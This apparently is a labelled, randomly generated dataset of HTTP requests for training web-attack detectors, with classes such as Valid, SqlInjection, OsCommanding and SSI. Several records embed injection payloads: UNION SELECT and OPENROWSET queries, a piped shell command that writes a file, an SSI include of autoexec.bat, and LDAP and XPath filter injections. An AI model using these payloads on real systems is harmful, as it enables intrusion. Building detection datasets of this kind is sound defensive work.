Warning: 089 33.136.50.173 "slomeeEwemt2tyii4es" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25588
Start - Id: 13578
class: Valid
GET /5syJK6u4z8gcVNVEWlS/ZNc.htm? HTTP/1.0
Host: www.rsekesnhhn.fr:4354
Connection: eeaeOaB
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: povf0uo=oe
Client-ip: 106.25.240.12
Cookie: er4oaddtiLrr=ie7|;7tndqAZGfchaving1=rTcbfhqj3Trssece;erH7treftsn44s=2
Cookie2: $Version="131"
Date: Thu, 14 Jan 10 09:21:53 UTC
ETag: W/"IOnm0rkrBrMeR1LhDFG"
Expect: sp4siceo
From: 3y8ohDtm@Errta.cz
If-Modified-Since: Fri, 22 Jan 10 15:45:21 CET
If-Unmodified-Since: Sat, 31 Jan 04 05:26:58 UTC
If-Match: "NagQlEMmNb4lO9XOI89d"
If-None-Match: *
If-Range: "XRYFjnEtNV8MaQQXfzOo"
Max-Forwards: 56
MIME-Version: 9.3
Pragma: Ggnn6loo='fest'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic dGlPanVlYWY6YkkwbTFp
Range: 625-
Referer: http://dhAt9lit.net/ehunura/ulko4o/strfOtau.wmn
TE: gzip
Trailer: Accept
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 2.4; ee-se; rv:0.8.1) Gecko/06148581
UA-CPU: Sparc
UA-Disp: 0610,0405,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/7.0 158.107.200.173, 1.3 www.eh00yf.css:885, 2.2 47.189.23.210
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 43.218.172.178
X-Serial-Number: 70032554284651
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13578
Start - Id: 41538
class: SqlInjection
PUT /2cUg-bodyEPTx/el5NYUSlocationmochahbetweenlibCB2/lacceptq9/ameusre9eUF/esMBcMEpgIQC0KuXHHF/tmEx@lhGOxToL/8e/sSTmogkONeEjFYe/wtdCzyILfJCi6L62/l67nncablo/yP25Xq7EOGI.jpg? HTTP/1.0
Content-Length: 188
Content-Language: odls
Content-Encoding: compress
Content-Location: http://lpta.uk/19eNrt/alogthny/aIitpc8h/LncwTeeU/9ehrio.mspx
Content-MD5: ZzVlb2NxaXV5c25yZHVhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jan 04 06:36:06 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: www.deaoms6.org
Connection: close
Accept: application/rtf;q=0.9, video/quicktime
Accept-Charset: windows-1257, utf-8, x-mac-chinesetrad;q=0.1, koi8;q=0.0, iso-8859-15;q=0.2
Accept-Encoding: 
Accept-Language: tJS-icmdcgS;q=0.8, jeo-ddsebza, aelto-hdr;q=0.1, ui-9tkreT, o5hhw-axmdrb1k;q=0.5
Cache-Control: max-stale=2105
Client-ip: 163.65.132.10
Cookie: pc8arhnCzxinia=noa5Zbm.kb;nercwi33eajfe=ohaving=aoelreeiframenczhome
Cookie2: $Version="56"
Date: Sun, 10 May 09 21:55:36 GMT
ETag: W/"6-69Euuq1Ajx0PW8f"
Expect: 100-continue
From: feAns@ntri9.gov
If-Modified-Since: Tue, 01 Jun 04 11:16:23 CET
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: "XO61CLVxA8jDp2cFBV"
Max-Forwards: 577
MIME-Version: 5.5
Pragma: a9ftehA0=lEf
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Range: 57094-3
Referer: /0MigoaEt/srhwFm/NccaOa/sadssiot/to9teT.php3
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/0.4 (X11; U; Linux i386 8.2; hr-ie; rv:6.6.2) Gecko/88506763
UA-CPU: StrongARM
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: identity
Upgrade: yan/3.4, tz3/5.3, ea1/9.3, tes/5.0, lleat/8.2
Warning: 202 172.75.239.75:0 "5HknetoSUn9esaen" 

ei5ectsdytrazT=SyrameRnhag&sbtrk='   )  UNION    ALL     SELECT     'iiat',05,947,'C3',34   FROM  etl   WHERE  (   ''    = '&ze0cin=eze5a5eee&SSYK=nyremoa6ntd

End - Id: 41538
Start - Id: 9743
class: Valid
GET /sQChVXbHIeJMbpgs8/AM-GNtmp9-ir/gCmUe5tibnfrtnli/h1D/eodtnorddos/NK/aryimeinnRiaoswd/khos8st4nHidvcbsjeu/0lI@u..asp?umsne=772061&ide6eiarsoea=98DWSbWSRl2&plueDebq=hhn2&oE3znEnog6eTn=5496&KVEMtVecho14i3=quess&yvi=513996&tsgt3oerern=23784&ldtiCesNbdewt=t9A&1enniielf=shz&7rD2nani=7&ch5io4zdw6f=t2NaoaIntcrrpdnhod&0hi=r&aeyAen7oLb9bes9=14&huadxb2kuv3tez=0653 HTTP/1.1
Host: www.0iwams8ost.fr
Connection: keep-alive
Accept: text/html, video/mpeg, application/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: atoe1-ewdteab;q=0.8, ncGno0h-wl;q=0.8, adUhhr4u-t4;q=0.0, ktaladee-Niol
Cache-Control: rrb7='o77cRitc'
Client-ip: 96.211.227.235
Cookie: K.boot.iniDPM273O1=eSiA;detstntAbroa=sa8ae
Cookie2: $Version="733"
Date: Fri, 18 Nov 05 04:11:20 GMT
ETag: "kBao7hZYa072OiIz"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Tue, 25 Oct 05 08:54:48 UTC
If-Unmodified-Since: Wed, 04 Jan 06 07:48:34 UTC
If-Match: "MYrWb0iwnTM6EJqT"
If-None-Match: "s6Vn9S6@30T-ahwwXDR."
If-Range: Thu, 19 Mar 09 12:34:05 UTC
Max-Forwards: 475
MIME-Version: 8.6
Pragma: v='onnub'
Proxy-Authorization: NTLM U25yenYwYXNodXNoYnNhSXJlb2RmZDhhT2llZHZub2Fwb0NuaExybA==
Authorization: bulwo r79ex=tyny
Range: 2-18,-5
Referer: /ndb9/iTeA/Uoee.mpeg
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.2 (X11; U; Linux i586 8.2; tt-eS; rv:4.7.1) Gecko/21977952
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6817x021
Via: HTTP/9.6 205.13.100.189, 8.3 236.229.250.108, 8.7 22.151.29.188
Transfer-Encoding: gzip
Upgrade: amceib/4.5, rmeBe/8.4, muaagw/6.1
Warning: 820 88.67.174.126 "oueorncn" "Fri, 18 Feb 05 24:11:21 CET"
X-Forwarded-For: 96.14.41.86
X-Serial-Number: 937322
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9743
Start - Id: 44566
class: OsCommanding
POST /orEsseg/ieZnnxiFoebghge/liseqs/kGa5DffI7z/lezhnnlcegkdd/pnamElArc/RBmF1XdP/Itme6isunwExlloryd/7o8PkOZDNEAbd.nNJgfd/prgCi0DDI7Qe8/lnbNUeavdrnuDM3L/ieaCgptilnr.shtml? HTTP/1.0
Content-Length: 191
Content-Language: h8aeces8
Content-Encoding: deflate
Content-Location: /ssrdLi0/toslRwil.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Host: 162.118.181.173
Connection: erTN
Accept: image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=99
Client-ip: 10.34.240.53
Cookie: h3T6sa0lt0nRrn=execn hsbetweeneen:6seval8ui|6e;foognO=noeoEandhconurt;waotHhr6i=ayn;ixjd=29;AOSeMfrom=:ae07re7)rdie;bho8enAewrteue=kzE92D0
Date: Sun, 30 Dec 07 23:24:11 UTC
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sat, 20 Aug 05 19:50:16 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: *
If-None-Match: "xoLBvkp7@itHq1eZ-"
Max-Forwards: 0
MIME-Version: 1.5
Pragma: no-cache
Authorization: Digest nonce
Referer: /acit/nrOot/ynesnga/iiedgtt.mpeg
TE: gzip;q=0.4
User-Agent: r6eONo5 http://www.tR4tecnP.org
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: compress
X-Forwarded-For: 91.169.45.106

ooeChD=ouc15l&be=31044&ie=emacopyTPaces6&neeke=t u@ &fmglAaei=rXyJwn3y&ll.iautoexecA81=56597&ermt9ya6oundli=aFH8v&3W-w5u=l?u&unszaoyo=11.114.116.176    | echo "test" >evilfile.txt

End - Id: 44566
Start - Id: 44637
class: PathTransversal
GET /hlraki/Wlcitxni3isteOD/yoX0Kmv@l/dftXmd8kBHmm/ecHC.vBgil9s/somnrialHt/ie2tvtDedrrvi/hvnwxmnyinmlFal.asp?Taio6p=7569&osh=8&odohciooxeulni=izlgsasroybe2fEfTo&sTylmEs=6694&x.-c=yosr4oerrh HTTP/1.1
Host: www.tegaayn.uk
Connection: H2QrIxfk
Accept: */*;q=0.5
Accept-Charset: windows-1251, iso-8859-7, iso-8859-4
Accept-Encoding: *
Accept-Language: file:///s:/Bezew/teta/keh.xml
Cache-Control: max-stale=27244
Client-ip: 95.91.76.121
Cookie: sW8k7=r&Rttform~keemeusror8cgE;9istiddu=nHxJs8;1tt=eztcaboreasAdz6r;t3oqo8s=4873;tpk=613
Cookie2: $Version="462"
Date: Fri, 01 Jul 05 12:33:52 GMT
ETag: W/"cGAy70d7vaGbD8LvCc"
Expect: e7cad
From: fsdIshc@oassmaqEaj.fr
If-Modified-Since: Mon, 24 May 04 23:44:57 CET
If-Unmodified-Since: Fri, 27 Oct 06 09:39:01 GMT
If-Match: "lt30@Q318biOT8Y"
If-None-Match: *
If-Range: Sun, 27 Jan 08 13:44:48 CET
Max-Forwards: 02
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic ZXVibmw6dGVybnI=
Authorization: oae6u ikoaig=ulh0yi
Range: 214148-2,-307
Referer: http://www.eb1Lws.org/eetscto7/7Ttts/nE1u/lMoG/aRnoebR.txt
TE: trailers
Trailer: Trailer
User-Agent: mceeH6oi (4Uxjpu; 32ra4bH.fQ; ip1NJg9)
UA-CPU: x86
UA-OS: FreeBSD
Via: 8.3 www.osriegi.png:14
Transfer-Encoding: identity
Upgrade: li4Qh/6.8
X-Serial-Number: 616147525
----: -----------------------------------

null

End - Id: 44637
Start - Id: 6210
class: Valid
POST /releyLrmfieo/aaa@0NDL/H0.shtml? HTTP/1.1
Content-Length: 292
Content-Language: oti
Content-Encoding: identity
Content-Location: /noOd/6ngoleom/itaaruas/m2wvme/onfnp6.jpg
Content-MD5: ZW5pZG50cnAxM1FkaDRodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Feb 07 11:04:07 CET
Last-Modified: Sat, 07 Nov 09 07:04:22 CET
Host: www.lREsg9fo.fr
Connection: keep-alive
Accept: audio/basic;q=0.8, application/*;q=0.9
Accept-Charset: ks_c_5601-1987, cp-932;q=0.1, iso-8859-9;q=0.6, windows-1258
Accept-Encoding: *;q=0.5
Accept-Language: dTnnywh-a;q=0.8, fta5azb-etfr
Cache-Control: max-age=88
Client-ip: 225.75.47.14
Cookie: egoAas0aorr=@ezibh;982dgoQ9onnd=3024
Cookie2: $Version="96"
Date: Thu, 06 Jul 06 02:08:58 GMT
ETag: W/"XSfWp9Vf4w3PBEA"
Expect: 100-continue
From: 9gene@c1isinsH.it
If-Modified-Since: Wed, 01 Jun 05 04:20:50 UTC
If-Unmodified-Since: Mon, 12 Nov 07 16:58:56 UTC
If-Match: *
If-None-Match: *
If-Range: "OM74vjFWwKTG6Zbzy9_r"
Max-Forwards: 177
MIME-Version: 1.5
Pragma: her10='etadoS'
Proxy-Authorization: Basic dFJsYXJlbzM6MHFvcw==
Authorization: EIEd eOnvph=0yuacswt
Range: 08944-,040-34609
Referer: http://www.snaEi.com/maotWh/l2mtls9/jtnS4me/ho6dj/piaetas.php3
TE: trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/5.4 (compatible; MSIE 3.2; WinNT; aomo5db5; sVt1ttn)
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 478x1113
Via: FTP/4.4 199.73.73.99, 1.6 www.ouwT.gif
Transfer-Encoding: deflate
Upgrade: hearu/8.5
Warning: 555 94.168.0.143 "gwzateahhss4B" 
X-Forwarded-For: 27.53.52.203
X-Serial-Number: 0109822
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

efneb=atulepts9tpomeEaa&5h3E8birczea=ezZE&n9mohacap1os50u=1122302843&aehunsty=u&o1cal=flehet7eonteuei&rmrqotsrhm=74&JMClinkopenjnph-KP6=t.RlHa&n6aod6vYdnehedm=gOhvDRFKNSI4&nlwa=ora&eitattpVtBEop=mmTto8hyiet&9_tNU6SCRo=]tmp&gGhVkf1zbS=snsystem=nn&RIugGR=nedH 3t1&l9iPhtnowoau=5&dsgerg=v;

End - Id: 6210
Start - Id: 40706
class: SSI
POST /9k_KytwGsw/foa/r21TK4EK.t-GKE/ye0onaOHnea/yyD9rvsNAqPnG.cgi? HTTP/1.1
Content-Length: 55
Content-Language: 8Do
Content-Encoding: compress
Content-Location: /frfhaatn/aeatnolt.cfm
Content-MD5: YWZubHNOZWUzeUFqc3JpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Aug 09 24:09:58 UTC
Last-Modified: Sat, 08 Mar 08 03:06:53 CET
Host: www.eioir.ch
Connection: jaae
Accept: text/*, video/*;q=0.1, audio/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: <!--    #include    virtual="d:\windows\autoexec.bat"-->
Cache-Control: no-store
Client-ip: 125.54.127.63
Cookie: qxAt@Fu=uon|trGelr2https1y;atr0lihaeb=h3trj;n8tit5fEmect=135;iH9=15;MmG-kk7WGWb=w'aosinyi;4Wstrtaeacr=94
Cookie2: $Version="56"
Date: Sat, 14 Apr 07 15:17:19 UTC
If-Modified-Since: Thu, 22 Nov 07 04:59:25 CET
If-Match: "1D.dY9Q6-zHQqIE"
If-Range: "70VrJs0g1f1x4JTuPBjP"
Pragma: iEy51nt='48al'
Referer: http://www.eniy2ev.de/ean8dL/idDoo.png
User-Agent: Mozilla/4.9 (X11; U; Solaris 3.8; sN-oi; rv:4.4.0) Gecko/63454904
Via: 0.3 7.237.177.231, 6.4 www.0ms5o.jpeg
Transfer-Encoding: 0Ne8So
~~~~~: ~~~~~~~~~~~~~~~~

htaeeidntTenld=L$&nDqhpSe4esnmnii=894&jhtieomcu=o1xvW

End - Id: 40706
Start - Id: 38020
class: LdapInjection
GET /tuiA3Uz5froi/tjjYS0aUyxlXtQ/iadtikr/htaccesUHp.mspx?nhanuptd=%40t+oetotlST&usrIsiwene4=%29++%28++%7C+++%28kljis%3DhfeAy*%29&esn=bo&t1wnsvnieaets=o9U3h4qLq&djtead=046&ete=nbwheshnEitqpka&h5iOcechn=02474944&9eUtc=eo&eawar=oita%5D9I%29 HTTP/1.1
Host: www.eaeit72rm.fr:80
Connection: fuhfoiS
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=943
Client-ip: 32.153.101.139
Cookie: VbGBZFL=iy09orETo
Cookie2: $Version="58"
Date: Wed, 18 Nov 09 06:39:25 CET
ETag: "CWR7-aWJfea7H_qYuD"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 08 Apr 10 12:26:59 GMT
If-Unmodified-Since: Thu, 22 Mar 07 17:34:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Mar 04 13:42:52 CET
Max-Forwards: 986
MIME-Version: 8.2
Pragma: ynot=Ensd
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: 663102-
Referer: /eultazO/Mykqw/oepEuar/AlO6ina/yesueh.tiff
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: xbsehhsRBjhviia
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.6 129.247.36.140
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 871 35.130.69.56 "hdEagaRnal3ae" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38020
Start - Id: 31510
class: Valid
GET /e9/oj17fVjG/HRQX1AacceptIxJ_GMKQ/ghgoifolA4se/hh9dVtn/exAoL/cbKwget/odBOpRTZ2o/ohZXqA/xitne.gif?dze8Inyjsfuo=6459&Xfa0.between=k7sn&lmdnatrts0e=09&Esdrn=27&aScXstdinGA=6cat+i&9ttnue6to=68&aeaeishkten=69&aavtmeo=+nealt%26one%3CexI&yF3M9=ladcwiecwxe%40A&zeiitgew=th7bqfechol0faiidoscript&6epoua2t6tc1i=4rip%7ETtdocumentaio5&iatyinRdid=oC2uXsZF&gdIraka2atoot=e+ HTTP/1.0
Host: www.eotsoieeZ.net
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.1, compress, gzip
Accept-Language: ugdRsd4t-r;q=0.7
Cache-Control: max-stale
Client-ip: 252.75.180.242
Cookie: SXSuXe=oKl7cEahtaccesn8Thnur
Cookie2: $Version="403"
Date: Sat, 26 Apr 08 08:11:26 CET
ETag: "uIVah_S2ygxc.oU"
Expect: 100-continue
From: hsiOlt@xdxec0.fr
If-Modified-Since: Sat, 09 Oct 04 13:32:59 GMT
If-Unmodified-Since: Thu, 29 Jun 06 15:58:40 CET
If-Match: "AV7g9odkjuOOOWkYQ1O"
If-None-Match: "Njbqx3RzKG9tB.wey"
If-Range: Wed, 20 Oct 04 18:46:08 GMT
Max-Forwards: 6211
MIME-Version: 6.4
Pragma: 9mkaA=et
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="giu2ra"
Range: -89812,-061835,42050-159934
Referer: http://hr9s.gov/tnk2ipg/aha5/b7p6S/exTo.conf
TE: chunked,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 9.7; aS-rc; rv:4.5.2) Gecko/61257286
UA-CPU: Sparc
UA-Disp: 254,5965,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 484x1465
Via: 4.4 244.212.144.127, 1.0 www.grfc4.jpg, 9.9 71.172.203.142
Transfer-Encoding: fo4u; ehu5t=nnAnesm
Upgrade: eb9wts/3.1
Warning: 187 www.tdwd.js "edymttrish6s2ehurma" "Thu, 12 Mar 09 02:19:38 GMT"
X-Forwarded-For: 41.171.103.8
X-Serial-Number: 5515370509152
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31510
Start - Id: 48394
class: XPathInjection
GET /soeptdswdh2as/u6a4zBincludeekpositionlogK5Ir/cEgQr0b7n.c9A27P8Tr/ajaHe4bSoA7S@mu55e/bOnullcFLmj7meta-.cfm? HTTP/1.0
Host: www.z2o5t.ch:71809
Connection: gaue
Accept: */*
Accept-Charset: x-mac-korean, x-mac-icelandic;q=0.0
Accept-Encoding: 
Accept-Language: ij7mpna1-riei, m-7wue;q=0.4, nu7ne-Tlyx, Reiolr-epdd2o, tS-caoejeM
Cache-Control: min-fresh=0507
Client-ip: 7.15.202.235
Cookie: rRwA=hl'   or path/child::node()[position()=N]   or  'e958e' =   ';je=8760429
Cookie2: $Version="14"
Date: Mon, 14 Aug 06 01:57:12 UTC
ETag: "o.e.Okr@JEYerTuKvnt"
Expect: 100-continue
From: Eeet7cah@Ioed.uk
If-Modified-Since: Thu, 16 Jul 09 08:09:16 CET
If-Unmodified-Since: Sat, 27 May 06 01:59:42 UTC
If-Match: *
If-None-Match: "W07dtvdlWFqsNpyDYI"
If-Range: Fri, 16 Jan 09 21:15:53 GMT
Max-Forwards: 7
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: Digest uri=/7iclmmBt/wbxhrs.wmn
Range: 966-,8322-,-48
Referer: /niyqg/ewfusoL/evx5u/oep9/ooNa0n.html
TE: deflate,gzip;q=0.5,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: bnno7e (tHCbjBO)
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 128x9065
Via: 2.9 www.tsiTdi.js:9892, 6.7 135.249.80.134:52920, 6.6 www.sstrn.jpeg
Transfer-Encoding: compress
Upgrade: tvzRch/0.9, odTegh/6.6, 6sxrte/4.3
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 60.162.169.118
X-Serial-Number: 5741877656321
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48394
Start - Id: 42794
class: SqlInjection
POST /Fc/efE/msoaWrc6ewla.html? HTTP/1.0
Content-Length: 180
Content-Language: ovitse,Hr,rsbamsep
Content-Encoding: identity
Content-Location: /ei7asw/joec.cfm
Content-MD5: ZURlYWpjeDRuc2tsbk9xcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Mar 06 02:19:42 UTC
Host: www.oyii7a.net:43085
Connection: shsa
Accept: image/gif
Accept-Charset: iso-8859-9;q=0.8
Accept-Encoding: compress;q=0.9
Cache-Control: max-age=882
Client-ip: 244.4.219.50
Cookie: s4ialLVanewB0=auO']ei;aryelor=eixovdSLd8tsqE;Esxo883=;  insert     into  OPENROWSET(    'SQLoledb','uid=eer;pwd=tsoaa;Network=DBMSSOCN;Address=49.111.40.3,1433;','select    *  from     _sysdatabases');    select  *    from LinkedOrRemoteSrv1.master.dbo.sysdatabases
Cookie2: $Version="12"
Date: Mon, 08 Aug 05 04:31:03 GMT
Expect: 100-continue
From: haCtibi@eAtie.it
If-Modified-Since: Wed, 26 Nov 08 18:22:05 UTC
If-Unmodified-Since: Fri, 26 Mar 10 04:34:32 UTC
If-Match: *
If-Range: *
Max-Forwards: 68
Referer: /iiln6dN.swf
User-Agent: Mozilla/4.6 (compatible; Konqueror/8.4; Linux i386; qdst; melPr; aeoyhewm)
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

itiI4=6293557&erdu=8&3ejelty=emrrItnca0naifftI9l&iIstennCXuhah=e-aa~laaT&us=1560868981&9oHhyhdN=e$caE&ge8rublEye0f=9999664371&s15NS@=tHRG_h6@dFJ&nLTtt5eld=682&uaxhe=oroxterme

End - Id: 42794
Start - Id: 13701
class: Valid
GET /nhjLuas/1uAPb3qh/ngyfKgZ6po-T_Y.jpeg?etamv=rlarmetano&hittsiwgoL=iwvf0e&eesrCsugfsa=q%3D%2Brta6tia%2Fos&hPZjS=eSkZOVXcODz&heEduk1rnoRee=695534&erGeiuee5=me%28o%7E&OrrlTbe6fnfrh1i=eRe2pww18P.t&ha5eed9Ss=kM%40Cx8&iesldu=928&z3u0aol3muduA=pnyxNIb&lEmailR@d0=ndbVzl_kEI HTTP/1.1
Host: 106.72.192.185
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-jp;q=0.6
Accept-Encoding: compress, gzip;q=0.0, deflate;q=0.8, deflate;q=0.5, gzip
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 8.253.133.52
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sat, 24 Nov 07 17:12:27 UTC
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Mon, 08 Jun 09 12:49:20 GMT
If-Unmodified-Since: Wed, 01 Oct 08 19:39:58 GMT
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 02
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: sinane Id8nwt=6eipE
Range: 7428-
Referer: /asrnA/3OL6hqtn/inndanhn/atsce/iuStah.php4
TE: trailers,trailers,chunked;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 7.0; z7-te; rv:4.3.9) Gecko/77635152
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: 1.3 69.142.201.137
Transfer-Encoding: compress
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13701
Start - Id: 38945
class: LdapInjection
GET /eo3Ctlutax6itsl/nNyjLV3iKgX4/liNozrurxu3lomvrezi/99boot.iniga/p.o_GImG_EsSLRy_CI/nYC2i5wsLq/cqbdr.png?7mzx7vsEstrn=%29++%28%7C%28Theb%3Dlitr*%29&2p3wl8fSL4ZM=b%40k&qouri=%2B%25G1stdinyodnd0ab&pexntmeeW=sa&zsenaede1tce=pdhtarkA%28nyoeecmyqxo&ncimodu=trtdea&SRadminf8R=677078&zeihpdniSbohtch=tsa0nr&wkb=oaetis2ecgRireahi HTTP/1.0
Host: www.eilt.biz
Connection: keep-alive
Accept: video/*;q=0.6, video/*, application/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: nve-e, a8Abrrea-Eai, Dpnteoos-Ismet3p;q=0.7
Cache-Control: no-cache
Client-ip: 222.159.26.220
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="7"
Date: Fri, 19 Aug 05 10:57:22 UTC
ETag: "WgOE-@mxQ2kn4lL8xC_"
Expect: leah=Oactsgd
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 04 Mar 04 11:34:35 GMT
If-Unmodified-Since: Fri, 23 Dec 05 24:48:45 GMT
If-Match: *
If-None-Match: "8b4EsaMoXn.iLGv"
If-Range: Tue, 20 Jan 04 04:59:28 CET
Max-Forwards: 073
MIME-Version: 8.6
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 19115-,-68,486-99
Referer: http://www.frrk.cz/stta6h/8aanoso/bsg8ieh/lzdeoo.conf
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/9.9 (compatible; tjttnn; Windows NT; rJcTaeenvn; yoaErgoy)
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: omnR/7.2 www.1faed.png, ggaos/6.8 65.244.238.102, 3.9 www.coofel.html
Transfer-Encoding: identity
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38945
Start - Id: 26956
class: Valid
GET /Tfdfr1n6fmnjlu/ewHbll/D.X.PdeG4hdocumentdQ/trAe89jVI4U5f4zV/iE2VrnZM/itoNveaIepBgtco/mlskgUSduQ/eeo3.jpeg?Nidijq=Benefmxd7i8nep&5sm8naqDwq5domh=455575&TintfevcR=%2Baahhutueeoaeiframe&wtpriemotywu=am&azngmararhilqn=t00meecaAio HTTP/1.0
Host: 83.169.145.67
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: tnnp-dePis
Cache-Control: no-transform
Client-ip: 239.237.217.85
Cookie: Ansehie3a=68534;z6BiZrY6Pb=wsete8pereet;wsmfl3=$eoul;o A2;aoJoU7nmh3r=fnoz;IVX9NtZoc5Fw=6;fxEV6R=l0f@i
Cookie2: $Version="50"
Date: Sun, 10 Sep 06 14:05:04 UTC
ETag: W/"CboD6nDft9xjGDtyWeg"
Expect: 100-continue
From: naeolznc@aqswey.biz
If-Modified-Since: Tue, 30 Sep 08 11:05:41 CET
If-Unmodified-Since: Sun, 15 Nov 09 13:10:43 GMT
If-Match: "K24..S2g66hCEr3"
If-None-Match: *
If-Range: Sat, 01 Apr 06 11:24:18 UTC
Max-Forwards: 7
MIME-Version: 7.2
Pragma: no-cache
